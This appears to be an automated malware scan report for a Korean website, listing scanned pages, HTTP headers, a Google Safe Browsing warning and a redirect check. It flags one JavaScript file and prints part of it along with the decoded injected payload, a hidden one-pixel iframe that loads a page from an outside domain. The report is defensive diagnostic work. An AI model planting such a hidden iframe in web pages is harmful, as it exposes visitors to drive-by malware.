Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kaphe.hanja114.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://kaphe.hanja114.org/ | 200 OK Content-Length: 12831 Content-Type: text/html | clean |
http://kaphe.hanja114.org/js/common.js | 200 OK Content-Length: 14468 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: cris.cyber1388.kr function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
} function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf('#')!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_f ...[4071 bytes skipped]... Decoded script: <iframe src='http://cris.cyber1388.kr/New/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://kaphe.hanja114.org/default.asp | 200 OK Content-Length: 12831 Content-Type: text/html | clean |
http://kaphe.hanja114.org/menu_01.asp | 200 OK Content-Length: 5979 Content-Type: text/html | clean |
http://kaphe.hanja114.org/menu_02.asp | 200 OK Content-Length: 6230 Content-Type: text/html | clean |
http://kaphe.hanja114.org/menu_04.asp | 200 OK Content-Length: 5988 Content-Type: text/html | clean |
http://kaphe.hanja114.org/menu_05.asp | 200 OK Content-Length: 6005 Content-Type: text/html | clean |
http://kaphe.hanja114.org/menu_06.asp | 200 OK Content-Length: 6340 Content-Type: text/html | clean |
http://kaphe.hanja114.org/menu_07.asp | 200 OK Content-Length: 6539 Content-Type: text/html | clean |
http://kaphe.hanja114.org/board/bd_notice.asp | 200 OK Content-Length: 10760 Content-Type: text/html | clean |
http://kaphe.hanja114.org/board/bd_notice.asp?f=hit&page=1&fld=&key=&RID=27 | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 12:35:03 GMT Location: bd_notice.asp?f=read&page=1&fld=&key=&RID=27 Server: Microsoft-IIS/6.0 Content-Length: 181 Content-Type: text/html Set-Cookie: ASPSESSIONIDCSCBRTSR=HHDKJMADFNOCICNOAIHKHMCM; path=/ X-Powered-By: ASP.NET | clean |
http://kaphe.hanja114.org/board/bd_notice.asp?f=read&page=1&fld=&key=&rid=27 | 200 OK Content-Length: 11275 Content-Type: text/html | clean |
http://kaphe.hanja114.org/board/download.asp?s=ȸ¿øÀü_ÃâÇ°¿ø¼.hwp&t=%C8%B8%BF%F8%C0%FC%5F%C3%E2%C7%B0%BF%F8%BC%AD%2Ehwp | 200 OK Content-Length: 31744 Content-Type: application/unknown | clean |
http://kaphe.hanja114.org/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://kaphe.hanja114.org/board/download.asp?s=ȸ¿øÀü_ÃâÇ°¿ø¼.pdf&t=%C8%B8%BF%F8%C0%FC%5F%C3%E2%C7%B0%BF%F8%BC%AD%2Epdf | 200 OK Content-Length: 302369 Content-Type: application/unknown | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kaphe.hanja114.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 12:34:49 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Length: 12831
Content-Type: text/html; Charset=EUC-KR
Expires: Tue, 13 Jan 2015 12:34:48 GMT
Set-Cookie: ASPSESSIONIDCSCBRTSR=MGDKJMADIKGDAGPABMFFIBNM; path=/
X-Powered-By: ASP.NET
...12831 bytes of data.
GET / HTTP/1.1
Host: kaphe.hanja114.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 12:34:49 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Length: 12831
Content-Type: text/html; Charset=EUC-KR
Expires: Tue, 13 Jan 2015 12:34:48 GMT
Set-Cookie: ASPSESSIONIDCSCBRTSR=MGDKJMADIKGDAGPABMFFIBNM; path=/
X-Powered-By: ASP.NET
...12831 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kaphe.hanja114.org
Referer: http://www.google.com/search?q=kaphe.hanja114.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kaphe.hanja114.org
Referer: http://www.google.com/search?q=kaphe.hanja114.org
Result:
The result is similar to the first query. There are no suspicious redirects found.